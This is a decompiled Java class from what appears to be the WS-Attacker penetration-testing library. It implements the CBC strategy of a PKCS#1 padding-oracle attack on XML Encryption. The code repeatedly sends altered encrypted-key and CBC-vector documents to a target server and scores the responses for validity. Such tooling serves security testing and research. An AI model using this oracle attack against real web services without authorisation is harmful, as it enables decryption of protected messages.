/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.attackengine.oracle.concrete.pkcs1.strategy;

import org.apache.log4j.Logger;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import wsattacker.library.signatureWrapping.util.exception.InvalidPayloadException;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.cbc.CBCVectorGenerator;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.request.OracleRequest;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.response.OracleResponse;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.concrete.pkcs1.PKCS1Oracle;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.concrete.pkcs1.strategy.AbstractPKCS1Strategy;
import wsattacker.library.xmlencryptionattack.encryptedelements.ElementAttackProperties;
import wsattacker.library.xmlencryptionattack.encryptedelements.data.EncryptedDataElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.EncryptedKeyElement;
import wsattacker.library.xmlencryptionattack.util.HelperFunctions;
import wsattacker.library.xmlencryptionattack.util.ServerSendCommandIF;
import wsattacker.library.xmlutilities.dom.DomUtilities;

public class CBCStrategy
extends AbstractPKCS1Strategy {
    private final OracleRequest[] m_RandomEncDataValues;
    private Document m_DmyAttackDoc;
    private static final Logger LOG = Logger.getLogger((String)CBCStrategy.class.getName());

    public CBCStrategy(PKCS1Oracle pkcs1Oracle) {
        EncryptedKeyElement encKeyPayEl;
        Element encDataOfEncKey = null;
        this.m_PKSC1Oracle = pkcs1Oracle;
        this.m_RandomEncDataValues = CBCVectorGenerator.generateVectors(this.m_PKSC1Oracle.getAttackedAlgoritm().BLOCK_SIZE);
        if (this.m_PKSC1Oracle.getAttackPayload() instanceof EncryptedKeyElement) {
            EncryptedDataElement encData = null;
            encKeyPayEl = (EncryptedKeyElement)this.m_PKSC1Oracle.getAttackPayload();
            encData = HelperFunctions.getEncDataOfEncryptedKey(encKeyPayEl);
            ElementAttackProperties attackProps = encData.getAttackProperties();
            if (null != attackProps.getAttackPayloadElement()) {
                encDataOfEncKey = attackProps.getAttackPayloadElement();
            } else {
                encDataOfEncKey = encData.getEncryptedElement();
                if (null != attackProps.getSignedPart()) {
                    LOG.warn((Object)"EncData signed but no wrapping attacks executed");
                }
            }
        } else {
            throw new IllegalArgumentException("PKCS1ErrorOracle defined but no encryptedkey attack palyoad set");
        }
        this.m_DmyAttackDoc = DomUtilities.createNewDomFromNode((Node)this.m_PKSC1Oracle.getAvoidedFile().getDocumentElement());
        ElementAttackProperties attackPropsKey = encKeyPayEl.getAttackProperties();
        Element encKeyPay = DomUtilities.findCorrespondingElement((Document)this.m_DmyAttackDoc, (Element)attackPropsKey.getAttackPayloadElement());
        Element encKeyData = DomUtilities.findCorrespondingElement((Document)this.m_DmyAttackDoc, (Element)encDataOfEncKey);
        this.m_AttackPayloadKeyDmy = new EncryptedKeyElement(encKeyPay);
        this.m_AttackPayloadDataDmy = new EncryptedDataElement(encKeyData);
    }

    @Override
    public OracleResponse handleRequest(ServerSendCommandIF serverSendCmnd, OracleRequest request) {
        OracleResponse respMaxScore = null;
        String responseServer = null;
        OracleResponse resp = new OracleResponse();
        this.m_AttackPayloadKeyDmy.getCipherDataChild().setEncryptedData(request.getEncryptedKeyBase64());
        for (int i = 0; this.m_RandomEncDataValues.length > i; ++i) {
            this.m_AttackPayloadDataDmy.getCipherDataChild().setEncryptedData(this.m_RandomEncDataValues[i].getEncryptedDataBase64());
            try {
                this.m_PKSC1Oracle.handleTimeStamp(this.m_DmyAttackDoc);
            }
            catch (InvalidPayloadException ex) {
                LOG.warn((Object)ex);
            }
            responseServer = serverSendCmnd.send(DomUtilities.domToString((Document)this.m_DmyAttackDoc));
            resp.setResponse(responseServer);
            respMaxScore = this.m_PKSC1Oracle.getOracleBehaviour().compareServerRespWithUserClassification(resp, this.m_AttackPayloadKeyDmy);
            if (OracleResponse.Result.VALID == respMaxScore.getResult()) break;
        }
        return respMaxScore;
    }
}

